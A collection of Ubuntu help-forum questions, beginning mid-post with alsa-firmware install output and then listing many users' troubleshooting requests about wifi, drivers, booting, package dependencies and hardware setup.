] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/ess' /usr/bin/install -c -m 644 maestro3_assp_kernel.fw maestro3_assp_minisrc.fw '/lib/firmware/ess' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/maestro3' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/maestro3' making install in multisound make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware- 1.0.27/multisound' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' make [ 2 ] : nothing to be done for `install-exec-am ' . make install-data-hook make [ 3 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' /usr/bin/install -c -d /lib/firmware/turtlebeach cd /lib/firmware/turtlebeach & & \ rm -f msndinit.bin & & \ ln -s /etc/sound/msndinit.bin msndinit.bin cd /lib/firmware/turtlebeach & & \ rm -f msndperm.bin & & \ ln -s /etc/sound/msndperm.bin msndperm.bin cd /lib/firmware/turtlebeach & & \ rm -f pndspini.bin & & \ ln -s /etc/sound/pndspini.bin pndspini.bin cd /lib/firmware/turtlebeach & & \ rm -f pndsperm.bin & & \ ln -s /etc/sound/pndsperm.bin pndsperm.bin make [ 3 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' making install in sb16 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/sb16' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/sb16' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/sb16' /usr/bin/install -c -m 644 mulaw_main.csp alaw_main.csp ima_adpcm_init.csp ima_adpcm_playback.csp ima_adpcm_capture.csp '/lib/firmware/sb16' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/sb16' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/sb16' making install in wavefront make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/wavefront' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/wavefront' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/yamaha' /usr/bin/install -c -m 644 yss225_registers.bin '/lib/firmware/yamaha' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/wavefront' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/wavefront' making install in ymfpci make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/ymfpci' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/ymfpci' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/yamaha' /usr/bin/install -c -m 644 ds1_dsp.fw ds1_ctrl.fw ds1e_ctrl.fw '/lib/firmware/yamaha' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/ymfpci' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/ymfpci' making install in aica make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/aica' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/aica' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware' /usr/bin/install -c -m 644 aica_firmware.bin '/lib/firmware' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/aica' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/aica' making install in ca0132 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/ca0132' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/ca0132' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware' /usr/bin/install -c -m 644 ctefx.bin ctspeq.bin '/lib/firmware' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/ca0132' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/ca0132' make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27' make [ 2 ] : nothing to be done for `install-exec-am ' . make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27' this is what comes up when i locate usx2yloader . i am searching for /usr/bin/usx2yloader or /usr/sbin/usx2yloader . /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/makefile /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/makefile.am /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/makefile.in /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/readme /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/an2131.asm /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/tascam_loader.asm /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/tascam_loader.ihx /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us122.conf /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us122.prepad /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us122.rbt /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us122fw.ihx /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us224.conf /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us224.prepad /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us224.rbt /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us224fw.ihx /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us428.conf /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us428.prepad /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us428.rbt /home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader/us428fw.ihx /usr/local/share/alsa/firmware/usx2yloader /usr/local/share/alsa/firmware/usx2yloader/tascam_loader.ihx /usr/local/share/alsa/firmware/usx2yloader/us122.conf /usr/local/share/alsa/firmware/usx2yloader/us122.prepad /usr/local/share/alsa/firmware/usx2yloader/us122.rbt /usr/local/share/alsa/firmware/usx2yloader/us122fw.ihx /usr/local/share/alsa/firmware/usx2yloader/us224.conf /usr/local/share/alsa/firmware/usx2yloader/us224.prepad /usr/local/share/alsa/firmware/usx2yloader/us224.rbt /usr/local/share/alsa/firmware/usx2yloader/us224fw.ihx /usr/local/share/alsa/firmware/usx2yloader/us428.conf /usr/local/share/alsa/firmware/usx2yloader/us428.prepad /usr/local/share/alsa/firmware/usx2yloader/us428.rbt /usr/local/share/alsa/firmware/usx2yloader/us428fw.ihx /usr/share/alsa/firmware/usx2yloader /usr/share/alsa/firmware/usx2yloader/tascam_loader.ihx /usr/share/alsa/firmware/usx2yloader/us122.conf /usr/share/alsa/firmware/usx2yloader/us122.prepad /usr/share/alsa/firmware/usx2yloader/us122.rbt /usr/share/alsa/firmware/usx2yloader/us122fw.ihx /usr/share/alsa/firmware/usx2yloader/us224.conf /usr/share/alsa/firmware/usx2yloader/us224.prepad /usr/share/alsa/firmware/usx2yloader/us224.rbt /usr/share/alsa/firmware/usx2yloader/us224fw.ihx /usr/share/alsa/firmware/usx2yloader/us428.conf /usr/share/alsa/firmware/usx2yloader/us428.prepad /usr/share/alsa/firmware/usx2yloader/us428.rbt /usr/share/alsa/firmware/usx2yloader/us428fw.ihx this is all the info i can think of ! if you have anything that can help it will be greatly appreciated ! ! thanks for your help in advance guys and gals ! ! -halfhead
376886	plug software confusion	i have a fender mustang ii amp that has a linux version of the fuse softare , called plug . the instructions tell me to type two commands into the source directory . i cant find that anywhere . is there anybody that has already installed this and has it working on their machine that can give me a step by step instruction on how to install this ? i have ubuntu 12.04 lts . im still pretty new to linux and i wasnt that savvy with windows so im pretty lost here . any help would be much appreciated ! thank you in advance .
376887	are the gufw default profiles empty ?	i 've just installed gufw on my notebook . i 'm trying to setup my laptop with a very secure - roadwarrior - type of configuration . so the choices available in gufw with a public , home and office profile look very promising . but then i got worried . because enabling these profiles did n't do very much , rather nothing at all . i 've looked in the documentation , but it seems to me that it is n't very well documented . any suggestions what would be a good setup for the public/home/office profiles ?
376889	ubuntu not starting up after installation	after having several issues with vista i installed ubuntu today . all went well , then it asked to restart , now there is nothing . first the red/orange screen comes up with no writing then goes blank ( dark ) makes a little sound thingy and that is it . what am i doing wrong ? oh and it is a hp laptop ... i really need this sorted , please help..
376890	indicator-datetime stops the disk from spinning down	i 'm running ubuntu 13.10 on a laptop , and have laptop-mode-tools installed . i 've noticed that , while running on battery , the laptop 's hard disk is not spinning down successfully . about every five seconds , the disk starts spinning down but then something makes it spin back up again . i 've investigated this a bit ( with the help of google ) , and found some things : i 've installed and run iotop . every time the disk starts spinning down , iotop reports that the process init -- user is writing to the disk and using 99 % io . after letting the laptop `` alone '' for 2 or 3 minutes on battery , find -cmin -1 on my home directory reports that the file ~/.cache/upstart/unity-panel-service.log was recently modified . if i run tail -f ~/.cache/upstart/unity-panel-service.log , i noticed that this file is updated every second , and the line ** ( unity-panel-service:2711 ) : warning ** : unable to support gtkimagetype : 0 is appended . sudo strace -p < `` init -- user '' 's pid > constantly outputs the following lines ( or similar ) : read ( 3 , 0x7fff3c96871b , 1 ) = -1 eagain ( resource temporarily unavailable ) waitid ( p_all , 0 , { } , wnohang|wexited|wstopped|wcontinued , null ) = 0 select ( 37 , [ 3 5 6 7 8 9 10 11 12 13 19 20 21 26 27 29 36 ] , [ ] , [ 7 8 9 10 12 20 21 ] , null ) = 1 ( in [ 36 ] ) read ( 36 , `` \r\n** ( unity-panel-service:2711 ) : '' ... , 8192 ) = 160 read ( 36 , 0x7f5a06c21830 , 8032 ) = -1 eagain ( resource temporarily unavailable ) fstat ( 14 , { st_mode=s_ifreg|0640 , st_size=384106 , ... } ) = 0 write ( 14 , `` \r\n** ( unity-panel-service:2711 ) : '' ... , 160 ) = 160 as a side note , cat /proc/sys/vm/dirty_writeback_centisecs returns 500 while on ac power and 60000 while on battery . has anyone noticed the same thing ? i do n't know if this occurs in a fresh install ( or if this occurred in 13.04 ) .
376893	set a program to open at specific screen location at a certain resolution	i 'm writing a python program to open certain programs based on the time i login ( i.e . whether i 'm in work or not ) . as such different programs open depending on time and i have to manually arrange their screen position . for example , before 6 i 'll have chrome open on my external monitor at a certain position with a certain resolution . after 6 i 'll have it maximised on my laptop screen . would i need to append something after $ chrome to do this or would another method be used ?
376897	for what i have `` public '' , `` templates '' and `` examples '' in my home directory ?	what is the purpose of `` public '' , `` templates '' and `` examples '' directories in my home directory ? what should i put in there ? and is ok if i delete them ? if yes , then when i create them again they will have the same icons ?
376898	wifi scanning results say no scan results	i 'm trying to use wifi access in ubuntu 12.04 and for some reason , i do not want to use network-manager . so , i removed it . what i 'm trying to do is to see what kind of aps around me , so i issued the following command and results in : $ sudo iwlist wlan0 scan wlan0 no scan results i 'm pretty sure that i have lot of aps around me , and i 'm not sure that my device is not working correctly , or am i missing something . lspci shows the correct device $ lspci | grep broad 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) i up the wlan0 with the following command $ ifconfig wlan0 up could you tell me what i 'm doing wrong here ?
376905	will a 6gb of ram will be fine and efficiant to run in 32-bit ubuntu ?	i am using ubuntu 13.10 in a intel dual core 3 ghz processor with 2 gb of ram and i would like to buy a 4 gb of ram extra and what best i can use it more efficiently and how i am supposed to achieve that ? my plan is to run some database server .
376906	weird rendering in eclipse	since some days ago , i am experimenting the following rendering issues in eclipse ( in any workspace or version of eclipse ) , but i do n't know where/how should i fix it . see the attached pictures : i just would like to say that this is only happening in eclipse , and not other programs .
376915	how can i drop a specific packet from my netwirk traffic using wireshark ubuntu	how can i drop a specific packet from my network traffic using wireshark ubuntu
376919	is there any problem if i copy ubuntu partition to any other partiotions ?	is there any problem if i copy ubuntu partition and paste it to another patition and deleted the original ubuntu partition using gparted from live usb
376921	planning on installing ubuntu but scared of wifi problems	i am new to ubuntu , and i am planning to switch to it . now i am on windows and i found out that some people have problems with their wifi after installation . and i wanted to know if my router can be connected to ubuntu . i do n't know what is the difference between a wifi card and a router , and i am a newbie in all of this tech stuff whatsoever . so i need some help here . btw my router is a thomson tg585v7 . i have no idea of the manufacturer nor the chipset . and i do n't connect by cable but by wireless .
376922	nvidia-settings lost after reboot	i have a fresh ubuntu 13.10 install and a dual-monitor setup . i ca n't get the setup working propely because the monitor settings get reverted every time i reboot . how do i fix this ? note that i get the initial settings when i start nvidia-settings after a logout/reboot .
376923	aptoncd installation error	when i try to install aptoncd from software center , i encounter the following error package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details the following packages have unmet dependencies : aptoncd : depends : python ( > = 2.7 ) but 2.7.3-0ubuntu2 is to be installed depends : python-central ( > = 0.6.11 ) but 0.6.17ubuntu1 is to be installed depends : synaptic ( > = 0.57.7 ) but 0.75.9ubuntu1 is to be installed depends : python-gnome2 but it is not going to be installed depends : python-apt ( > = 0.7.93 ) but 0.8.3ubuntu7.1 is to be installed please advise how can this be resolved ?
376926	trying to install ubuntu , but no grub file so it keeps crashing	i have tried to install ubuntu on my laptop but it keeps stopping a few minutes into the installation . is there a file i can burn onto my usb along with the ubuntu image file that would solve the problem ? my laptop meets minimum requirements , has been formatted so i have no os on it at the moment . i have seen a previous response to this stating that you have to change the code from something to something else , but it assumed i knew where to do this . if there is something technical , can someone please explain precisely where all the changes have to be done , how to access everything , etc . otherwise is there another linux os i can install ? thanks
376929	eth0 always goes down	my problem is my lan connection always goes up and down . sometimes it works perfectly but a lot of time it does n't . here are my hardware specs : motherboard : gigabyte , ga-x58a-ud7 . it comes with 2 realtek ethernet pcie lan router : zyxel keenetic 4g $ uname -a linux server-desktop 2.6.32-53-generic-pae # 115-ubuntu smp wed oct 23 17:44:16 utc 2013 i686 gnu/linux $ cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp $ cat /etc/dhcp3/dhclient.conf # ... leaving out everything that is commented request subnet-mask , broadcast-address , time-offset , routers , domain-name , domain-name-servers , domain-search , host-name , netbios-name-servers , netbios-scope , interface-mtu , rfc3442-classless-static-routes , ntp-servers ; end vendor-class-identifier `` msft 5.0 '' ; $ ifconfig # ... leaving out eth1 lo etc . eth0 link encap : ethernet hwaddr 1c:6f:65:94:58 : cd inet addr:192.168.1.35 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fd58:48c8:2da5:0:1e6f:65ff : fe94:58cd/64 scope : global inet6 addr : fe80 : :1e6f:65ff : fe94:58cd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7815 errors:0 dropped:0 overruns:0 frame:0 tx packets:8640 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5841826 ( 5.8 mb ) tx bytes:1250252 ( 1.2 mb ) interrupt:32 base address:0xe000 $ lspci | grep -i ether 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) $ /usr/sbin/ethtool -i eth0 driver : r8168 version : 8.037.00-napi firmware-version : bus-info : 0000:07:00.0 $ /sbin/lsmod | grep r8168 r8168 240944 0 some from my log files nov 14 17:18:25 server-desktop kernel : [ 964.478260 ] r8168 : eth0 : link up nov 14 17:18:25 server-desktop kernel : [ 964.478492 ] addrconf ( netdev_change ) : eth0 : link becomes ready nov 14 17:18:25 server-desktop kernel : [ 964.678691 ] userif-2 : sent link down event . nov 14 17:18:35 server-desktop kernel : [ 964.678694 ] userif-2 : sent link up event . nov 14 17:19:25 server-desktop kernel : [ 1024.899257 ] userif-2 : sent link down event . nov 14 17:19:36 server-desktop kernel : [ 1024.899260 ] userif-2 : sent link up event . nov 14 17:19:36 server-desktop kernel : [ 1035.839137 ] userif-2 : sent link down event . nov 14 17:19:36 server-desktop kernel : [ 1035.839141 ] userif-2 : sent link up event . nov 14 17:19:36 server-desktop kernel : [ 1035.954788 ] addrconf ( netdev_up ) : eth0 : link is not ready nov 14 17:19:36 server-desktop kernel : [ 1036.055765 ] userif-2 : sent link down event . nov 14 17:19:42 server-desktop kernel : [ 1036.055767 ] userif-2 : sent link up event . nov 14 17:19:42 server-desktop kernel : [ 1041.950400 ] r8168 : eth0 : link up nov 14 17:19:42 server-desktop kernel : [ 1041.950898 ] addrconf ( netdev_change ) : eth0 : link becomes ready nov 14 17:19:42 server-desktop kernel : [ 1042.151099 ] userif-2 : sent link down event . nov 14 17:19:43 server-desktop kernel : [ 1042.151103 ] userif-2 : sent link up event . nov 14 17:19:43 server-desktop kernel : [ 1042.532152 ] userif-2 : sent link down event . nov 14 17:23:48 server-desktop kernel : [ 1042.532155 ] userif-2 : sent link up event . nov 14 17:23:48 server-desktop kernel : [ 1287.309445 ] addrconf ( netdev_up ) : eth0 : link is not ready nov 14 17:23:48 server-desktop kernel : [ 1287.320671 ] userif-2 : sent link down event . nov 14 17:23:59 server-desktop kernel : [ 1287.320674 ] userif-2 : sent link up event . nov 14 17:23:59 server-desktop kernel : [ 1298.301786 ] r8168 : eth0 : link up nov 14 17:23:59 server-desktop kernel : [ 1298.302014 ] addrconf ( netdev_change ) : eth0 : link becomes ready nov 14 17:23:59 server-desktop kernel : [ 1298.502221 ] userif-2 : sent link down event . nov 14 17:24:01 server-desktop kernel : [ 1298.502224 ] userif-2 : sent link up event . nov 14 17:24:01 server-desktop kernel : [ 1300.281431 ] userif-2 : sent link down event . ps : sometimes the network works fine for a couple of days , then the problem returns again .
376931	how to install cpu sim	i have recently switched from windows 7 to ubuntu 12.04 . i want to know how to install cpu sim 3.9.0 in ubuntu . what are the commands in terminal used for installing .
376932	why does the `` who '' command not show `` root '' as a logged in user ?	when i log in as root from gnome-terminal using the command : sudo su it logs me in as the root user . is n't this switching a user considered as a log in ? also , which command can show me all the `` switching '' i have done ?
376933	ati drivers causing low-level graphics	i installed ati/radeon binary x.org drivers in ubuntu 13.10 from the software center , now it goes into low graphics mode . how do i uninstall it and fix the problem ? i tried terminal in recovery mode , but gives me apt and dpkg lock errors , read only file system when trying to uninstall . please assist me .
376934	ububtu 13.10 : wifi not working on hp650 laptop	after upgrading to ubuntu 13.10 , the wifi on my hp650 laptop no longer works . this happened before on 12.10 , but was fixed on subsequent updates . how to fix this issue ?
376937	how to install php 5.2.17 in ubuntu 13.10	i have ubuntu 13.10 and want to install php 5.2.17 . i tried out finding the repository for php 5.2 and found the link `` http : //oleksiy.pro/2013/03/29/installing-php-5-2-17-on-ubuntu-aws/ '' but did n't turned out to be handy . i installed php5.4 and tried downgrading to php 5.2 as per the link `` downgrade php5 5.5.3 to php5 5.3 in ubuntu 13.10 '' , but the result was same . so let me know other possible ways..
376939	htc one and ubuntu ( libmtp )	libmtp seems very unstable with the htc one . after copying about 10 file it crashes . it also has problems mounting sometimes and causes banshee to crash if i plug the phone in . does anyone have any ideas on how to use this correctly ? i 'm currently using adb to push files , which is not ideal .
376941	can not access âxampp-linux-x64-1.8.3-1-installer.runâ : no such file or directory	i am a complete novice with linux ubuntu . when installing xampp it occurs to me this message : can not access 'xampp-linux-x64-1.8.3-1-installer.run ' : no such file or directory i followed these instructions to install : for 64-bit ubuntu wget http : //www.apachefriends.org/download.php ? xampp-linux-x64-1.8.3-1-installer.run chmod + x xampp-linux-x64-1.8.3-1-installer.run ./xampp-linux-x64-1.8.3-1-installer.run on this page : unable to install xampp in ubuntu 13.04 thanks for the help
376942	does cloning my hdd to an external hdd leaves the external drive useless ?	i 'm planning to clone my 320gb hdd , having abut 100gb data to a 1tb external hdd . i fear doing so will leave my external hard disk useless . will it still be possible to store other data there after cloning ?
376943	how to set default login asking for password again ?	i want to set my login screen ( greeting screen or gui ) to the default setting , which asks for password befor let me login , i dont know how did i messed it out , now running saucy , it just can show me the list of desktop environments , but after i chose the environment i want , i just click and login directly , then after i login to the descktop another message pop out asking me to type my keyring password . i wounder if me inserted ( pgp ) key from previous system did that ! , any how , i just want the normal default login back , any help please ? step by step for a newbie i tried system settings -- > user accounts gui tool , or use the passwd command sudo passwd username pressing `` unlock '' but is not responding as all other `` unlock '' s in this laptop right now nor the terminal commands change anything , they change the password in terminal but still the same exat above mentioned drama
376944	mobilepartner not completing running	command in terminal : /usr/local/modile_partner/mobilepartner problem : the command does n't stop executing
376946	0 bytes of free space in home directory	i 'm using ubuntu 12.04 on a dell latitude e4300 laptop . also i 'm a complete noob on ubuntu . booting is without problems , and i can access the the login screen with a working graphical background . but after entering the correct password i 'm thrown back to the login screen . there is only a flashing error shown for a timespan of < 1 second . i can only read the first line before being thrown back to the login screen . it reads : pipe broken . i can however access the guest account . upon doing so i get an error message that says : there is 0 bytes of free space in the drive `` home '' . entering df -h confirms this error message : filesystem : dev/sda5 size : 84g available : 80g free : 0 usage : 100 % mounted in : /home filesystem : home/veronika/.private size : 84g available : 80g free : 0 usage : 100 % mounted in : /home/veronika so , what i 'm basically asking is advise on how to delete files from the home directory from the console . what i did as of now to fix the problem : ⠀• emptying the trash ⠀• using bleachbit ( failed ) ⠀• removing .xauthority ⠀• reinstalling nvidia driver none of these measures had any success . i 'd be really grateful for any kind of help .
376950	npm installed packages are not accessible	i installed nodejs with the instructions from this post on ubuntu 13.1 all went smooth . after that i installed express by issuing the command npm install express which result in express @ 3.4.4 node_modules/express ├── methods @ 0.1.0 ├── range-parser @ 0.0.4 ├── cookie-signature @ 1.0.1 ├── fresh @ 0.2.0 ├── debug @ 0.7.4 ├── buffer-crc32 @ 0.2.1 ├── cookie @ 0.1.0 ├── mkdirp @ 0.3.5 ├── commander @ 1.3.2 ( keypress @ 0.1.0 ) ├── send @ 0.1.4 ( mime @ 1.2.11 ) └── connect @ 2.11.0 ( methods @ 0.0.1 , uid2 @ 0.0.3 , pause @ 0.0.1 , raw-body @ 0.0.3 , qs @ 0.6.5 , bytes @ 0.2.1 , negotiator @ 0.3.0 , multiparty @ 2.2.0 ) but when i now type something like express demo i get the program 'express ' is currently not installed . you can install it by typing : sudo apt-get install node-express
376952	dual boot problem , black screen during the ubuntu boot	i have a problem with my dual boot ( windows 8 and ubuntu 13.1 ) on my asus vivo book . actually i 'm writing from a live of linux-secure-remix and i already used the boot repair tools . i can access and use windows 8 , but i ca n't boot with ubuntu ( also with recovery mode ) , the process is interrupted after few seconds . here , there is my summary report : http : //paste.ubuntu.com/6416043/ can you help me ? daniele
376954	booting from a pendrive ( usb ) doesnt work !	i 've created bootable usb by some software and set my first boot device to usb but it does n't booting . it does n't proceeds after showing `` verifying dmi pool data '' .
376955	problems mounting .iso bigger than 4.3 gb on saucy	i upgraded to saucy a couple days ago on my asus ux32vd-r4002h and i tried to mount various game isos . for some reason , it is impossible to mount images if they are as big as or bigger than 4.3 gb . regardless of the method i tried , i always get an input/output error stating that it is not possible to open the image..and i tried a lot : using command line ( sudo ) with : mount -t iso9660 -o loop /home/downloads/awesomegame.iso /media/1 fuseiso awesomegame.iso /media/1 converting the .iso with iat to ensure that they are iso9660 ( although im sure that all of them are ) tools i tried : opening/compress the isos with file-roller/7zip - > error acetoneiso gmountiso cdemu iso master furius iso mount i 'm quite desperate right now , but i can imagine that it is just a simple configuration fault by myself , because all images work perfectly in win7 with daemon tools . i have n't tried any of the images previously on another ubuntu version . any ideas ? thank you very much in advance and best regards , fabian //edit : even when trying to copy the .iso to my external hdd or via network to another notebook , i ll get the i/o-error ...
376956	output sox synthesized sound to file	i have the following sox command that generates a nifty 'spacecraft ' sound : play -n -c1 synth whitenoise band -n 100 20 band -n 50 20 gain +25 fade h 1 864000 1 how could i output about 10 seconds of this to a sound file ? thanks !
376957	identification and authentication methods in ubuntu	since i have a very long password , i would like to additionally use an alternative login method . which other authentication methods are possible in ubuntu to log in ?
376959	how to use network interface of another pc to connect to web	there is a server machine with two network interfaces : eth0 eth1 it can access the web through eth0 and eth1 is used for client machines to access the files on the server . how can i configure the network so that client machines can access the web through eth0 of the server machine ?
376963	show desktop command not working	i am using ubuntu 12.0.4 and have installed cinnamon desktop . i have set ctrl+supr+d as shortcut to show desktop [ hide all normal windows ] . but it does n't work . any suggestion on where am i going wrong ?
376965	how do i install the bc dependencies for oracle xe 10g ?	i want to install oracle xe 10g and shorewall on ubuntu 12.04 problem is oracle xe 10g needs bc : i386 and shorewall needs bc ( both are dependencies ) i think it is not possible to have both bcs . as oracle xe 10g only needs bc:386 for configure ( and not for running the database after configure ) , the idea is following : install oracle xe 10g with bc:386 uninstall bc : i386 ( database still runs bc : i386 , which only needed for configure ) with command : dpkg -r -- force-depends bc : i386 install shorewall ( and bc ) and everyone is happy . problem : when i want to use apt-get after dpkg -r -- force-depends bc : i386 it is complaining about unmet dependencies . apt-get install shorewall reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : oracle-xe-universal : i386 : depends : bc : i386 but it is not going to be installed shorewall : depends : bc but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how can i solve this problem ? and please consider that i want to use oracle xe 10g and shorewall . so i dont expect to use mysql instead of oracle . thank you !
376966	t902 : additional buttons - how to use them ?	i have a fujitsu t902 and have several problems . i guess i 'll split them up into different questions . i have installed 13.10 ubuntu , uname -a tells me : 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux first of all , i have on the screen additional buttons , in total 6 : win-button vol- vol+ copy ( or similar symbol ) a b i googled and found http : //ubuntuforums.org/archive/index.php/t-2014093.html and have some questions : when i run xev|grep keycode i get only for 1 , 5 and 6 a response : state 0x0 , keycode 161 ( keysym 0x0 , nosymbol ) , same_screen yes , state 0x0 , keycode 161 ( keysym 0x0 , nosymbol ) , same_screen yes , state 0x0 , keycode 186 ( keysym 0x1008ff79 , xf86scrolldown ) , same_screen yes , state 0x0 , keycode 186 ( keysym 0x1008ff79 , xf86scrolldown ) , same_screen yes , state 0x0 , keycode 185 ( keysym 0x1008ff78 , xf86scrollup ) , same_screen yes , state 0x0 , keycode 185 ( keysym 0x1008ff78 , xf86scrollup ) , same_screen yes , so , how to assign the ( already recognized ) buttons to an action ? e.g . to minimize all , change volume , or similar ? is there a chance to the 2 , 3 and 4 running ? if so , how ?
376968	login with facial recognition in ubuntu 13.04 ?	i have tried to install „pam face authentication“ with the following commands : sudo add-apt-repository ppa : antonio.chiurazzi sudo apt-get update sudo apt-get install pam-face-authentication but it seems , the latest package there , is for 11.04 „natty narwhal“ . is it possible to install and use it with ubuntu 13.04 „saucy salamander“ , or are there alternatives ?
376974	' what application ' for downlaod	i 'm trying desperatly hard to play an audio recording i made on my s4 . i have transfered it but i ca n't play it . when i try and download vls it keeps asking ' what application ? ' can anyone please advise . i have a deadline ! mark
376975	how do i display iso time system wide ?	i 'm in united states and am trying out ubuntu . very frustrated because all the dates and times are in non-sensical united states format : date = mm.dd.yy time = 12 hour format i want iso format to display system-wide : date = yyyy.mm.dd time = 24 hour format is this possible while keeping other united states locale stuff like $ ( dollar ) , language , etc ?
376978	t902 : autorotate screen	i have a fujitsu t902 and have several problems . i guess i 'll split them up into different questions . i have installed 13.10 ubuntu , uname -a tells me : 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux since the laptop is a convertible i want to change rotation when the screen is flipped resp . when i change the position . so , on the one hand the question for rotating the screen itself , on the other hand the question for changing position similar to a mobile device where you can change landscape and portrait mode easily . i tried with magick , but somehow failed with that approach : leo @ leo-lifebook-t902 : ~ ./magick-rotation please install 62-magick.rules in /etc/udev/rules.d . see installer.txt in the unpacked magick-rotation folder . leo @ leo-lifebook-t902 : ~/downloads/magick-rotation-1.6.2 $ ll /etc/ud udev/ udisks2/ leo @ leo-lifebook-t902 : ~/downloads/magick-rotation-1.6.2 $ ll /etc/udev/rules.d/ insgesamt 20 drwxr-xr-x 2 root root 4096 nov 14 15:42 ./ drwxr-xr-x 4 root root 4096 okt 16 20:59 ../ -rw-r -- r -- 1 root root 937 nov 14 15:42 62-magick.rules -rw-r -- r -- 1 root root 632 nov 14 12:59 70-persistent-net.rules -rw-r -- r -- 1 root root 1157 okt 12 13:01 readme so , my question is if there is a chance to get the rotation recognition working ? i do n't mind if its magick or not . but would be great if the additional sensors and the swivel hinge could be used to detect position changes ... .
376982	i lose my ip address after couple of minutes	i am using ubuntu 12.04 version with wpa_supplicant v0.7.3 . i manage to connect to wireless and it works fine . however after couple of minutes it loses the ip address . when i type `` iwconfig '' it will show me that i am still associated with the network . if i restart the router or type `` /etc/init.d/networking restart '' it will get the ip address again . or , if i add deferent the ip manually while its still connected it will stay connected . it 's so weird behavior . any one knows whats going on ? ?
376984	install ubuntu 13.04 alongside windows 7	i am trying to install ubuntu 13.04 alongside windows 7 but i do n't get the option to install ubuntu without deleting windows . how can i install it ?
376986	kompozer installation step by step	i have extracted the files to a carpet . what 's next ? . i do n't see any executable or shell script to execute the program on ubuntu . thanks .
